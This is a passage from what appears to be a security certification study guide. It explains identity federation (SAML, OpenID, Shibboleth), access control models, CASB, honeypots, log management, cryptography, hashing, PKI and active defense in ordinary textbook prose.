A consortium called the Liberty Alliance proposed an
extension to the SAML standard called the Liberty
Identity Federation Framework (ID-FF), which is
proposed to be a standardized cross-domain SSO
framework. It identifies a circle of trust, within which
each participating domain is trusted to document the
following about each user:
• The process used to identify a user
• The type of authentication system used
• Any policies associated with the resulting
authentication credential
Each member entity is free to examine this information
and determine whether to trust it. Liberty contributed
ID-FF to OASIS. In March 2005, SAML v2.0 was
announced as an OASIS standard. SAML v2.0 represents
the convergence of Liberty ID-FF and other proprietary
extensions.
In an unauthenticated SAMLv2 transaction, the browser
asks the service provider (SP) for a resource. The SP
provides the browser with an XHTML format. The
browser asks the identity provider (IP) to validate the
user and then provides the XHTML back to the SP for
access. The <nameID> element in SAML can be provided
as the X.509 subject name or by Kerberos principal
name.
To prevent a third party from identifying a specific user
as having previously accessed a service provider through
an SSO operation, SAML uses transient identifiers
(which are valid only for a single login session and are
different each time the user authenticates again but stay
the same as long as the user is authenticated).
SAML is a good solution in the following scenarios:
• When you need to provide SSO (when at least one
actor or participant is an enterprise)
• When you need to provide access to a partner or
customer application to your portal
• When you can provide a centralized identity
source
OpenID
OpenID is an open standard and decentralized protocol
by the nonprofit OpenID Foundation that allows users to
be authenticated by certain cooperating sites. The
cooperating sites are called relying parties (RPs).
OpenID allows users to log in to multiple sites without
having to register their information repeatedly. Users
select an OpenID identity provider and use the accounts
to log in to any website that accepts OpenID
authentication.
While OpenID solves the same issue as SAML, an
enterprise may find these advantages in using OpenID:
• It’s less complex than SAML.
• It’s been widely adopted by companies such as
Google.
On the other hand, you should be aware of the following
shortcomings of OpenID compared to SAML:
• With OpenID, auto-discovery of the identity
provider must be configured per user.
• SAML has better performance.
SAML can initiate SSO from either the service provider
or the identity provider, while OpenID can only be
initiated from the service provider.
In February 2014, the third generation of OpenID, called
OpenID Connect, was released. It is an authentication
layer protocol that resides atop the OAuth 2.0
framework. It is designed to support native and mobile
applications, and it defines methods of signing and
encryption.
Here is an example of SAML in action:
1. A user logs in to Domain A, using a PKI certificate
that is stored on a smart card protected by an
eight-digit PIN.
2. The credential is cached by the authenticating
server in Domain A.
3. Later, the user attempts to access a resource in
Domain B. This initiates a request to the Domain A
authenticating server to attest to the resource
server in Domain B that the user is in fact who she
claims to be.
Figure 8-26 illustrates the way the service provider
obtains the identity information from the identity
provider.
Figure 8-26 SAML
Shibboleth
Shibboleth is an open source project that provides
single sign-on capabilities and allows sites to make
informed authorization decisions for individual access of
protected online resources in a privacy-preserving
manner. Shibboleth allows the use of common
credentials among sites that are a part of the federation.
It is based on SAML. This system has two components:
• Identity providers: IPs supply the user
information.
• Service providers: SPs consume this
information before providing a service.
Role-Based Access Control
Role-based access control (RBAC) is commonly
used in networks to simplify the process of assigning new
users the permission required to perform a job role. In
this arrangement, users are organized by job role into
security groups, which are then granted the rights and
permissions required to perform that job. Figure 8-27
illustrates this process. The role is implemented as a
security group possessing the required rights and
permissions, which are inherited by all security group or
role members.
Figure 8-27 RBAC
This is not a perfect solution, however, and it carries
several security issues. First, RBAC is only as successful
as the organization policies designed to support it. Poor
policies can result in the proliferation of unnecessary
roles, creating an administrative nightmare for the
person managing user access. This can lead to mistakes
that reduce rather than enhance access security.
A related issue is that those managing user access may
have an incomplete understanding of the process, and
this can lead to a serious reduction in security. There can
be additional costs to the organization to ensure proper
training of these individuals. The key to making RBAC
successful is proper alignment with policies and proper
training of those implementing and maintaining the
system.
Note
A security issue can be created when a user is fired or quits. In both cases, all
access should be removed. Account reviews should be performed on a regular
basis to catch any old accounts that are still active.
Attribute-Based Access Control
Attribute-based access control (ABAC) grants or
denies user requests based on arbitrary attributes of the
user and arbitrary attributes of the object, and
environment conditions that may be globally recognized.
NIST SP 800-162 was published to define and clarify
ABAC.
According to NIST SP 800-162, ABAC is an access
control method where subject requests to perform
operations on objects are granted or denied based on
assigned attributes of the subject, assigned attributes of
the object, environment conditions, and a set of policies
that are specified in terms of those attributes and
conditions. An operation is the execution of a function at
the request of a subject upon an object. Operations
include read, write, edit, delete, copy, execute, and
modify. A policy is the representation of rules or
relationships that makes it possible to determine if a
requested access should be allowed, given the values of
the attributes of the subject, object, and possibly
environment conditions. Environment conditions are the
operational or situational context in which access
requests occur. Environment conditions are detectable
environmental characteristics, which are independent of
subject or object, and may include the current time, day
of the week, location of a user, or the current threat level.
Figure 8-28 shows a basic ABAC scenario according to
NIST SP 800-162.
Figure 8-28 NIST SP 800-162 Basic ABAC Scenario
As specified in NIST SP 800-162, there are
characteristics or attributes of a subject such as name,
date of birth, home address, training record, and job
function that may, either individually or when combined,
comprise a unique identity that distinguishes that person
from all others. These characteristics are often called
subject attributes.
Like subjects, each object has a set of attributes that help
describe and identify it. These traits are called object
attributes (sometimes referred to as resource
attributes). Object attributes are typically bound to their
objects through reference, by embedding them within
the object, or through some other means of assured
association such as cryptographic binding.
ACLs and RBAC are in some ways special cases of ABAC
in terms of the attributes used. ACLs work on the
attribute of “identity.” RBAC works on the attribute of
“role.” The key difference with ABAC is the concept of
policies that express a complex Boolean rule set that can
evaluate many different attributes. While it is possible to
achieve ABAC objectives using ACLs or RBAC,
demonstrating access control requirements compliance
is difficult and costly due to the level of abstraction
required between the access control requirements and
the ACL or RBAC model. Another problem with ACL or
RBAC models is that if the access control requirement is
changed, it may be difficult to identify all the places
where the ACL or RBAC implementation needs to be
updated.
ABAC relies upon the assignment of attributes to
subjects and objects, and the development of policy that
contains the access rules. Each object within the system
must be assigned specific object attributes that
characterize the object. Some attributes pertain to the
entire instance of an object, such as the owner. Other
attributes may only apply to parts of the object.
Each subject that uses the system must be assigned
specific attributes. Every object within the system must
have at least one policy that defines the access rules for
the allowable subjects, operations, and environment
conditions to the object. This policy is normally derived
from documented or procedural rules that describe the
business processes and allowable actions within the
organization. The rules that bind subject and object
attributes indirectly specify privileges (i.e., which
subjects can perform which operations on which
objects). Allowable operation rules can be expressed
through many forms of computational language such as
• A Boolean combination of attributes and
conditions that satisfies the authorization for a
specific operation
• A set of relations associating subject and object
attributes and allowable operations
Once object attributes, subject attributes, and policies
are established, objects can be protected using ABAC.
Access control mechanisms mediate access to the objects
by limiting access to allowable operations by allowable
subjects. The access control mechanism assembles the
policy, subject attributes, and object attributes, then
renders and enforces a decision based on the logic
provided in the policy. Access control mechanisms must
be able to manage the process required to make and
enforce the decision, including determining what policy
to retrieve, which attributes to retrieve in what order,
and where to retrieve attributes. The access control
mechanism must then perform the computation
necessary to render a decision.
The policies that can be implemented in an ABAC model
are limited only to the degree imposed by the
computational language and the richness of the available
attributes. This flexibility enables the greatest breadth of
subjects to access the greatest breadth of objects without
having to specify individual relationships between each
subject and each object.
While ABAC is an enabler of information sharing, the set
of components required to implement ABAC gets more
complex when deployed across an enterprise. At the
enterprise level, the increased scale requires complex
and sometimes independently established management
capabilities necessary to ensure consistent sharing and
use of policies and attributes and the controlled
distribution and employment of access control
mechanisms throughout the enterprise.
Mandatory Access Control
In mandatory access control (MAC), subject
authorization is based on security labels. MAC is often
described as prohibitive because it is based on a security
label system. Under MAC, all that is not expressly
permitted is forbidden. Only administrators can change
the category of a resource.
Because of the importance of security in MAC, labeling is
required. Data classification reflects the data’s
sensitivity. In a MAC system, a clearance is a privilege to
access a class of items that are organized by sensitivity.
Each subject and object is given a security or sensitivity
label. The security labels are hierarchical. For
commercial organizations, the levels of security labels
could be confidential, proprietary, corporate, sensitive,
and public. For government or military institutions, the
levels of security labels could be top secret, secret,
confidential, and unclassified.
In MAC, the system makes access decisions when it
compares a subject’s clearance level with an object’s
security label. MAC access systems operate in different
security modes at various times, based on variables such
as sensitivity of data, the clearance level of the user, and
the actions the user is authorized to take. These security
modes are as follows:
• Dedicated security mode: A system is
operating in dedicated security mode if it employs
a single classification level. In this system, all
users can access all data, but they must sign a
nondisclosure agreement (NDA) and be formally
approved for access on a need-to-know basis.
• System high security mode: In a system
operating in system high security mode, all users
have the same security clearance (as in the
dedicated security mode), but they do not all
possess a need-to-know clearance for all the
information in the system. Consequently,
although a user might have clearance to access an
object, she still might be restricted if she does not
have need-to-know clearance pertaining to the
object.
• Compartmented security mode: In a
compartmented security mode system, all users
must possess the highest security clearance (as in
both dedicated and system high security modes),
but they must also have valid need-to-know
clearance, a signed NDA, and formal approval for
all information to which they have access. The
objective is to ensure that the minimum number
of people possible have access to information at
each level or compartment.
• Multilevel security mode: When a system
allows two or more classification levels of
information to be processed at the same time, it is
said to be operating in multilevel security mode.
Users must have a signed NDA for all the
information in the system and have access to
subsets based on their clearance level and needto-know and formal access approval. These
systems involve the highest risk because
information is processed at more than one level of
security, even when all system users do not have
appropriate clearances or a need-to-know for all
information processed by the system. This is also
sometimes called controlled security mode.
Manual Review
Users who have been assigned privileged accounts have
been given the right to do things that could cause issues.
Privileged accounts, regardless of the authentication
method or architecture, must be monitored to ensure
that these additional rights are not abused.
While there are products that automate the audit of
privileged accounts, if all else fails a manual review must
be done on a regular basis. This task should not be
placed in the “when we have time” category. There’s
never time.
CLOUD ACCESS SECURITY
BROKER (CASB)
A cloud security broker, or cloud access security
broker (CASB), is a software layer that operates as a
gatekeeper between an organization’s on-premises
network and the provider’s cloud environment. It can
provide many services in this strategic position, as shown
in Figure 8-29. Vendors in the CASB include McAfee and
Netskope.
Figure 8-29 CASB
HONEYPOT
Honeypots are systems that are configured to be
attractive to hackers and lure them into spending time
attacking them while information is gathered about the
attack. In some cases entire networks called honeynets
are attractively configured for this purpose. These types
of approaches should only be undertaken by companies
with the skill to properly deploy and monitor them.
Care should be taken that the honeypots and honeynets
do not provide direct connections to any important
systems. This prevents providing a jumping-off point to
other areas of the network. The ultimate purpose of these
systems is to divert attention from more valuable
resources and to gather as much information about an
attack as possible. A tarpit is a type of honeypot designed
to provide a very slow connection to the hacker so that
the attack can be analyzed.
MONITORING AND LOGGING
Monitoring and monitoring tools will be discussed in
much more depth in several subsequent chapters, but it
is important that we talk here about logging and
monitoring in the context of infrastructure management.
Log Management
Typically, system, network, and security administrators
are responsible for managing logging on their systems,
performing regular analysis of their log data,
documenting and reporting the results of their log
management activities, and ensuring that log data is
provided to the log management infrastructure in
accordance with the organization’s policies. In addition,
some of the organization’s security administrators act as
log management infrastructure administrators, with
responsibilities such as the following:
• Contact system-level administrators to get
additional information regarding an event or to
request investigation of a particular event.
• Identify changes needed to system logging
configurations (for example, which entries and
data fields are sent to the centralized log servers,
what log format should be used) and inform
system-level administrators of the necessary
changes.
• Initiate responses to events, including incident
handling and operational problems (for example,
a failure of a log management infrastructure
component).
• Ensure that old log data is archived to removable
media and disposed of properly when it is no
longer needed.
• Cooperate with requests from legal counsel,
auditors, and others.
• Monitor the status of the log management
infrastructure (for example, failures in logging
software or log archival media, failures of local
systems to transfer their log data) and initiate
appropriate responses when problems occur.
• Test and implement upgrades and updates to the
log management infrastructure’s components.
• Maintain the security of the log management
infrastructure.
Organizations should develop policies that clearly define
mandatory requirements and suggested
recommendations for several aspects of log
management, including the following: log generation, log
transmission, log storage and disposal, and log analysis.
Table 8-3 provides examples of logging configuration
settings that an organization can use. The types of values
defined in Table 8-3 should only be applied to the hosts
and host components previously specified by the
organization as ones that must or should be logging
security-related events.
Table 8-3 Examples of Logging Configuration
Settings
Audit Reduction Tools
Audit reduction tools are preprocessors designed to
reduce the volume of audit records to facilitate manual
review. They are discussed in Chapter 7.
NIST SP 800-137
According to NIST SP 800-137, information security
continuous monitoring (ISCM) is defined as maintaining
ongoing awareness of information security,
vulnerabilities, and threats to support organizational risk
management decisions. Organizations should take the
following steps to establish, implement, and maintain
ISCM:
1. Define an ISCM strategy based on risk tolerance
that maintains clear visibility into assets,
awareness of vulnerabilities, up-to-date threat
information, and mission/business impacts.
2. Establish an ISCM program that includes metrics,
status monitoring frequencies, control assessment
frequencies, and an ISCM technical architecture.
3. Implement an ISCM program and collect the
security-related information required for metrics,
assessments, and reporting. Automate collection,
analysis, and reporting of data where possible.
4. Analyze the data collected, report findings, and
determine the appropriate responses. It may be
necessary to collect additional information to
clarify or supplement existing monitoring data.
5. Respond to findings with technical, management,
and operational mitigating activities or acceptance,
transference/sharing, or avoidance/rejection.
6. Review and update the monitoring program,
adjusting the ISCM strategy and maturing
measurement capabilities to increase visibility into
assets and awareness of vulnerabilities, further
enable data-driven control of the security of an
organization’s information infrastructure, and
increase organizational resilience.
ENCRYPTION
Protecting information with cryptography involves the
deployment of a cryptosystem. A cryptosystem consists
of software, protocols, algorithms, and keys. The
strength of any cryptosystem comes from the algorithm
and the length and secrecy of the key. For example, one
method of making a cryptographic key more resistant to
exhaustive attacks is to increase the key length. If the
cryptosystem uses a weak key, it facilitates attacks
against the algorithm.
While a cryptosystem supports the three core principles
of the confidentiality, integrity, and availability (CIA)
triad, cryptosystems directly provide authentication,
confidentiality, integrity, authorization, and nonrepudiation. The availability tenet of the CIA triad is
supported by cryptosystems, meaning that implementing
cryptography will help to ensure that an organization’s
data remains available. However, cryptography does not
directly ensure data availability, although it can be used
to protect the data. Security services provided by
cryptosystems include the following:
• Authentication: Cryptosystems provide
authentication by being able to determine the
sender’s identity and validity. Digital signatures
verify the sender’s identity. Protecting the key
ensures that only valid users can properly encrypt
and decrypt the message.
• Confidentiality: Cryptosystems provide
confidentiality by altering the original data in such
a way as to ensure that the data cannot be read
except by the valid recipient. Without the proper
key, unauthorized users are unable to read the
message.
• Integrity: Cryptosystems provide integrity by
allowing valid recipients to verify that data has not
been altered. Hash functions do not prevent data
alteration but provide a means to determine
whether data alteration has occurred.
• Authorization: Cryptosystems provide
authorization by providing the key to a valid user
after that user proves his identity through
authentication. The key given to the user allows
the user to access a resource.
• Non-repudiation: Non-repudiation in
cryptosystems provides proof of the origin of data,
thereby preventing the sender from denying that
he sent the message and supporting data integrity.
Public key cryptography and digital signatures
provide non-repudiation.
• Key management: Key management in
cryptography is essential to ensure that the
cryptography provides confidentiality, integrity,
and authentication. If a key is compromised, it
can have serious consequences throughout an
organization.
Cryptographic Types
Algorithms that are used in computer systems
implement complex mathematical formulas when
converting plaintext to ciphertext. The two main
components to any encryption system are the key and
the algorithm. In some encryption systems, the two
communicating parties use the same key. In other
encryption systems, the two communicating parties use
different keys in the process, but the keys are related.
This section discusses symmetric algorithms and
asymmetric algorithms.
Symmetric Algorithms
Symmetric algorithms use a private or secret key
that must remain secret between the two parties. Each
party pair requires a separate private key. Therefore, a
single user would need a unique secret key for every user
with whom she communicates.
Consider an example where there are 10 unique users.
Each user needs a separate private key to communicate
with the other users. To calculate the number of keys
that would be needed in this example, you would use the
following formula:
number of users × (number of users – 1) / 2
Therefore, in this example, you would calculate 10 × (10
– 1) / 2 = 45 needed keys.
With symmetric algorithms, the encryption key must
remain secure. To obtain the secret key, the users must
find a secure out-of-band method for communicating the
secret key, including courier or direct physical contact
between the users. A special type of symmetric key called
a session key encrypts messages between two users
during one communication session. Symmetric
algorithms can be referred to as single-key, secret-key,
private-key, or shared-key cryptography. Symmetric
systems provide confidentiality but not authentication or
non-repudiation. If both users use the same key,
determining where the message originated is impossible.
Symmetric algorithms include AES, IDEA, Blowfish,
Twofish, RC4/RC5/RC6, and CAST. Table 8-4 lists the
strengths and weaknesses of symmetric algorithms.
Table 8-4 Symmetric Algorithm Strengths and
Weaknesses
The two broad types of symmetric algorithms are
stream-based ciphers and block ciphers. Initialization
vectors (IVs) are an important part of block ciphers.
These three components are discussed next.
Stream-based Ciphers
Stream-based ciphers perform encryption on a bitby-bit basis and use keystream generators. The
keystream generators create a bit stream that is XORed
with the plaintext bits. The result of this XOR operation
is the ciphertext.
A synchronous stream-based cipher depends only on the
key, and an asynchronous stream cipher depends on the
key and plaintext. The key ensures that the bit stream
that is XORed to the plaintext is random.
Advantages of stream-based ciphers include the
following:
• They generally have lower error propagation
because encryption occurs on each bit.
• They are generally used more in hardware
implementations.
• They use the same key for encryption and
decryption.
• They are generally cheaper to implement than
block ciphers.
Block Ciphers
Block ciphers perform encryption by breaking the
message into fixed-length units. A message of 1024 bits
could be divided into 16 blocks of 64 bits each. Each of
those 16 blocks is processed by the algorithm formulas,
resulting in a single block of ciphertext. Examples of
block ciphers include IDEA, Blowfish, RC5, and RC6.
Advantages of block ciphers include the following:
• Implementation of block ciphers is easier than
stream-based cipher implementation.
• They are generally less susceptible to security
issues.
• They are generally used more in software
implementations.
Table 8-5 lists the key facts about each symmetric
algorithm.
Table 8-5 Symmetric Algorithms Key Facts
The Block ciphers mentioned earlier use initialization
vectors (IVs) to ensure that patterns are not produced
during encryption. These IVs provide this service by
using random values with the algorithms. Without using
IVs, a repeated phrase within a plaintext message could
result in the same ciphertext. Attackers can possibly use
these patterns to break the encryption.
Asymmetric Algorithms
Asymmetric algorithms use both a public key and a
private or secret key. The public key is known by all
parties, and the private key is known only by its owner.
One of these keys encrypts the message, and the other
decrypts the message. (Asymmetric algorithms are also
referred to as dual-key or public-key cryptography.)
In asymmetric cryptography, determining a user’s
private key is virtually impossible even if the public key
is known, although both keys are mathematically related.
However, if a user’s private key is discovered, the system
can be compromised.
Asymmetric systems provide confidentiality, integrity,
authentication, and non-repudiation. Because both users
have one unique key that is part of the process,
determining where the message originated is possible. If
confidentiality is the primary concern for an
organization, a message should be encrypted with the
receiver’s public key, which is referred to as secure
message format. If authentication is the primary
concern for an organization, a message should be
encrypted with the sender’s private key, which is referred
to as open message format. When using open message
format, the message can be decrypted by anyone with the
public key.
Asymmetric algorithms include Diffie-Hellman, RSA, El
Gamal, ECC, Knapsack, DSA, and Zero Knowledge Proof.
Table 8-6 lists the strengths and weaknesses of
asymmetric algorithms.
Table 8-6 Asymmetric Algorithm Strengths and
Weaknesses
Hybrid Encryption
Because both symmetric and asymmetric algorithms
have weaknesses, solutions have been developed that use
both types of algorithms in a hybrid cipher. By using
both algorithm types, the cipher provides confidentiality,
authentication, and non-repudiation.
The process for hybrid encryption is as follows:
1. The symmetric algorithm provides the keys used for
encryption.
2. The symmetric keys are passed to the asymmetric
algorithm, which encrypts the symmetric keys and
automatically distributes them.
3. The message is encrypted with the symmetric key.
4. Both the message and the key are sent to the
receiver.
5. The receiver decrypts the symmetric key and uses
the symmetric key to decrypt the message.
An organization should use hybrid encryption if the
parties do not have a shared secret key and large
quantities of sensitive data must be transmitted.
Integrity is one of the three basic tenets of security.
Message integrity ensures that a message has not been
altered by using parity bits, cyclic redundancy checks
(CRCs), or checksums.
The parity bit method adds an extra bit to the data. This
parity bit simply indicates if the number of 1 bits is odd
or even. The parity bit is 1 if the number of 1 bits is odd,
and the parity bit is 0 if the number of 1 bits is even. The
parity bit is set before the data is transmitted. When the
data arrives, the parity bit is checked against the other
data. If the parity bit doesn’t match the data sent, then
an error is sent to the originator.
The CRC method uses polynomial division to determine
the CRC value for a file. The CRC value is usually 16 or 32
bits long. Because CRC is very accurate, the CRC value
does not match up if a single bit is incorrect.
The checksum method adds up the bytes of data being
sent and then transmits that number to be checked later
using the same method. The source adds up the values of
the bytes and sends the data and its checksum. The
receiving end receives the information, adds up the bytes
in the same way the source did, and gets the checksum.
The receiver then compares his checksum with the
source’s checksum. If the values match, message
integrity is intact. If the values do not match, the data
should be re-sent or replaced. Checksums are also
referred to as hash sums because they typically use hash
functions for the computation.
Message integrity is provided by hash functions and
message authentication code, as discussed next.
Hashing Functions
Hash functions are used to ensure integrity. This section
discusses some of the most popular hash functions.
Some of these might no longer be commonly used
because more secure alternatives are available. Security
professionals should be familiar with the following hash
functions:
• One-way hash
• MD2/MD4/MD5/MD6
• SHA/SHA-2/SHA-3
A hash function takes a message of variable length and
produces a fixed-length hash value. Hash values, also
referred to as message digests, are calculated using the
original message. If the receiver calculates a hash value
that is the same, then the original message is intact. If
the receiver calculates a hash value that is different, then
the original message has been altered.
Using a given function H, the following equation must be
true to ensure that the original message, M1, has not
been altered or replaced with a new message, M2:
H(M1) < > H(M2)
One-way Hash
For a one-way hash to be effective, creating two different
messages with the same hash value must be
mathematically impossible. Given a hash value,
discovering the original message from which the hash
value was obtained must be mathematically impossible.
A one-way hash algorithm is collision free if it provides
protection against creating the same hash value from
different messages.
Unlike symmetric and asymmetric algorithms, the
hashing algorithm is publicly known. Hash functions are
always performed in one direction. Using it in reverse is
unnecessary.
However, one-way hash functions do have limitations. If
an attacker intercepts a message that contains a hash
value, the attacker can alter the original message to
create a second, invalid message with a new hash value.
If the attacker then sends the invalid message to the
intended recipient, the intended recipient has no way of
knowing that he received an incorrect message. When
the receiver performs a hash value calculation, the
invalid message looks valid because the invalid message
was appended with the attacker’s new hash value, not the
original message’s hash value.
To prevent the preceding scenario from occurring, the
sender should use a message authentication code
(MAC). Encrypting the hash function with a symmetric
key algorithm generates a keyed MAC. The symmetric
key does not encrypt the original message. It is used only
to protect the hash value.
Figure 8-30 outlines the basic steps of a hash function.
Figure 8-30 Hash Function Process
Message Digest Algorithm
The MD2 message digest algorithm produces a 128-bit
hash value. It performs 18 rounds of computations.
Although MD2 is still in use today, it is much slower than
MD4, MD5, and MD6.
The MD4 algorithm also produces a 128-bit hash value.
However, it performs only three rounds of computations.
Although MD4 is faster than MD2, its use has
significantly declined because attacks against it have
been so successful.
Like the other MD algorithms, the MD5 algorithm
produces a 128-bit hash value. It performs four rounds of
computations. It was originally created because of the
issues with MD4, and it is more complex than MD4.
However, MD5 is not collision free. For this reason, it
should not be used for SSL/TLS certificates or digital
signatures. The U.S. government requires the usage of
SHA-2 instead of MD5. However, in commercial usage,
many software vendors publish the MD5 hash value
when they release software patches so customers can
verify the software’s integrity after download.
The MD6 algorithm produces a variable hash value,
performing a variable number of computations.
Although it was originally introduced as a candidate for
SHA-3, it was withdrawn because of early issues the
algorithm had with differential attacks. MD6 has since
been re-released with this issue fixed. However, that
release was too late to be accepted as the NIST SHA-3
standard.
Secure Hash Algorithm
Secure Hash Algorithm (SHA) is a family of four
algorithms published by NIST. SHA-0, originally
referred to as simply SHA because there were no other
“family members,” produces a 160-bit hash value after
performing 80 rounds of computations on 512-bit blocks.
SHA-0 was never very popular because collisions were
discovered.
Like SHA-0, SHA-1 produces a 160-bit hash value after
performing 80 rounds of computations on 512-bit blocks.
SHA-1 corrected the flaw in SHA-0 that made it
susceptible to attacks.
SHA-3, the latest version, is actually a family of hash
functions, each of which provides different functional
limits. The SHA-3 family is as follows:
• SHA3-224: Produces a 224-bit hash value after
performing 24 rounds of computations on 1152bit blocks
• SHA3-256: Produces a 256-bit hash value after
performing 24 rounds of computations on 1088bit blocks
• SHA-3-384: Produces a 384-bit hash value after
performing 24 rounds of computations on 832-bit
blocks
• SHA3-512: Produces a 512-bit hash value after
performing 24 rounds of computations on 576-bit
blocks
Keep in mind that SHA-1 and SHA-2 are still widely used
today. SHA-3 was not developed because of some
security flaw with the two previous standards but was
instead proposed as an alternative hash function to the
others.
Transport Encryption
Securing data at rest and data in transit leverages the
respective strengths and weaknesses of symmetric and
asymmetric algorithms. Applying the two types of
algorithms is typically done as shown in Table 8-7.
Table 8-7 Applying Cryptography
Transport encryption ensures that data is protected
when it is transmitted over a network or the Internet.
Transport encryption protects against network sniffing
attacks.
Security professionals should ensure that their
enterprises are protected using transport encryption in
addition to protecting data at rest. As an example, think
of an enterprise that implements token and biometric
authentication for all users, protected administrator
accounts, transaction logging, full-disk encryption,
server virtualization, port security, firewalls with ACLs,
NIPS, and secured access points. None of these solutions
provides any protection for data in transport. Transport
encryption would be necessary in this environment to
protect data. To provide this encryption, secure
communication mechanisms should be used, including
SSL/TLS, HTTP/HTTPS/SHTTP, SET, SSH, and IPsec.
SSL/TLS
Secure Sockets Layer (SSL) is a transport-layer protocol
that provides encryption, server and client
authentication, and message integrity. SSL/TLS was
discussed earlier in this chapter.
HTTP/HTTPS/SHTTP
Hypertext Transfer Protocol (HTTP) is the protocol used
on the Web to transmit website data between a web
server and a web client. With each new address that is
entered into the web browser, whether from initial user
entry or by clicking a link on the page displayed, a new
connection is established because HTTP is a stateless
protocol.
HTTP Secure (HTTPS) is the implementation of HTTP
running over the SSL/TLS protocol, which establishes a
secure session using the server’s digital certificate.
SSL/TLS keeps the session open using a secure channel.
HTTPS websites always include the https:// designation
at the beginning.
Although it sounds similar to HTTPS, Secure HTTP (SHTTP) protects HTTP communication in a different
manner. S-HTTP only encrypts a single communication
message, not an entire session (or conversation). SHTTP is not as commonly used as HTTPS.
SSH
Secure Shell (SSH) is an application and protocol that
is used to remotely log in to another computer using a
secure tunnel. After the secure channel is established
after a session key is exchanged, all communication
between the two computers is encrypted over the secure
channel.
IPsec
Internet Protocol Security (IPsec) is a suite of protocols
that establishes a secure channel between two devices.
IPsec is commonly implemented over VPNs. IPsec was
discussed earlier in this chapter.
CERTIFICATE MANAGEMENT
A public key infrastructure (PKI) includes systems,
software, and communication protocols that distribute,
manage, and control public key cryptography. A PKI
publishes digital certificates. Because a PKI establishes
trust within an environment, a PKI can certify that a
public key is tied to an entity and verify that a public key
is valid. Public keys are published through digital
certificates.
The X.509 standard is a framework that enables
authentication between networks and over the Internet.
A PKI includes timestamping and certificate revocation
to ensure that certificates are managed properly. A PKI
provides confidentiality, message integrity,
authentication, and non-repudiation.
The structure of a PKI includes certificate authorities,
certificates, registration authorities, certificate
revocation lists, cross-certification, and the Online
Certificate Status Protocol (OCSP). This section discusses
these PKI components as well as a few other PKI
concepts.
Certificate Authority and Registration
Authority
Any participant that requests a certificate must first go
through the registration authority (RA), which
verifies the requestor’s identity and registers the
requestor. After the identity is verified, the RA passes the
request to the certificate authority.
A certificate authority (CA) is the entity that creates
and signs digital certificates, maintains the certificates,
and revokes them when necessary. Every entity that
wants to participate in the PKI must contact the CA and
request a digital certificate. It is the ultimate authority
for the authenticity for every participant in the PKI by
signing each digital certificate. The certificate binds the
identity of the participant to the public key.
There are different types of CAs. Organizations exist who
provide a PKI as a payable service to companies who
need them. An example is Verisign. Some organizations
implement their own private CAs so that the
organization can control all aspects of the PKI process. If
an organization is large enough, it might need to provide
a structure of Cas, with the root CA being the highest in
the hierarchy.
Because more than one entity is often involved in the PKI
certification process, certification path validation allows
the participants to check the legitimacy of the certificates
in the certification path.
Certificates
A digital certificate provides an entity, usually a user,
with the credentials to prove its identity and associates
that identity with a public key. At minimum, a digital
certification must provide the serial number, the issuer,
the subject (owner), and the public key.
An X.509 certificate complies with the X.509 standard.
An X.509 certificate contains the following fields:
• Version
• Serial Number
• Algorithm ID
• Issuer
• Validity
• Subject
• Subject Public Key Info
• Public Key Algorithm
• Subject Public Key
• Issuer Unique Identifier (optional)
• Subject Unique Identifier (optional)
• Extensions (optional)
Verisign first introduced the following digital certificate
classes:
• Class 1: Intended for use with email. These
certificates get saved by web browsers.
• Class 2: For organizations that must provide
proof of identity.
• Class 3: For servers and software signing in
which independent verification and identity and
authority checking is done by the issuing CA.
Certificate Revocation List
A certificate revocation list (CRL) is a list of digital
certificates that a CA has revoked. To find out whether a
digital certificate has been revoked, the browser must
either check the CRL or the CA must push out the CRL
values to clients. This can become quite daunting when
you consider that the CRL contains every certificate that
has ever been revoked.
One concept to keep in mind is the revocation request
grace period. This period is the maximum amount of
time between when the revocation request is received by
the CA and when the revocation actually occurs. A
shorter revocation period provides better security but
often results in a higher implementation cost.
OCSP
The Online Certificate Status Protocol (OCSP) is
an Internet protocol that obtains the revocation status of
an X.509 digital certificate. OCSP is an alternative to the
standard certificate revocation list (CRL) that is used by
many PKIs. OCSP automatically validates the certificates
and reports back the status of the digital certificate by
accessing the CRL on the CA.
PKI Steps
The steps involved in requesting a digital certificate are
as follow:
1. A user requests a digital certificate, and the RA
receives the request.
2. The RA requests identifying information from the
requestor.
3. After the required information is received, the RA
forwards the certificate request to the CA.
4. The CA creates a digital certificate for the
requestor. The requestor’s public key and identity
information are included as part of the certificate.
5. The user receives the certificate.
After the user has a certificate, she is ready to
communicate with other trusted entities. The process for
communication between entities is as follows:
1. User 1 requests User 2’s public key from the
certificate repository.
2. The repository sends User 2’s digital certificate to
User 1.
3. User 1 verifies the certificate and extracts User 2’s
public key.
4. User 1 encrypts the session key with User 2’s public
key and sends the encrypted session key and User
1’s certificate to User 2.
5. User 2 receives User 1’s certificate and verifies the
certificate with a trusted CA.
After this certificate exchange and verification process
occurs, the two entities are able to communicate using
encryption.
Cross-Certification
Cross-certification establishes trust relationships
between CAs so that the participating CAs can rely on the
other participants’ digital certificates and public keys. It
enables users to validate each other’s certificates when
they are actually certified under different certification
hierarchies. A CA for one organization can validate
digital certificates from another organization’s CA when
a cross-certification trust relationship exists.
Digital Signatures
A digital signature is a hash value encrypted with the
sender’s private key. A digital signature provides
authentication, non-repudiation, and integrity. A blind
signature is a form of digital signature where the
contents of the message are masked before it is signed.
Public key cryptography is used to create digital
signatures. Users register their public keys with a
certificate authority (CA), which distributes a certificate
containing the user’s public key and the CA’s digital
signature. The digital signature is computed by the user’s
public key and validity period being combined with the
certificate issuer and digital signature algorithm
identifier.
The Digital Signature Standard (DSS) is a federal digital
security standard that governs the Digital Security
Algorithm (DSA). DSA generates a message digest of 160
bits. The U.S. federal government requires the use of
DSA, RSA, or Elliptic Curve DSA (ECDSA) and SHA for
digital signatures. DSA is slower than RSA and only
provides digital signatures. RSA provides digital
signatures, encryption, and secure symmetric key
distribution.
When considering cryptography, keep the following facts
in mind:
• Encryption provides confidentiality.
• Hashing provides integrity.
• Digital signatures provide authentication, nonrepudiation, and integrity.
ACTIVE DEFENSE
The importance of defense systems in network
architecture is emphasized throughout this book. In the
context of cybersecurity, the term active defense has
more to do with process than architecture. Active defense
is achieved by aligning your incident identification and
incident response processes such that there is an element
of automation built into your reaction to any specific
issue. So what does that look like in the real world? One
approach among several is called the Active Cyber
Defense Cycle, illustrated in Figure 8-31.
Figure 8-31 Active Cyber Defense Cycle
While it may not be obvious from the graphic, one of the
key characteristics of this approach is that there is an
active response to the security issue. This departs from
the classic approach of deploying passive defense
mechanisms and relying on them to protect assets.
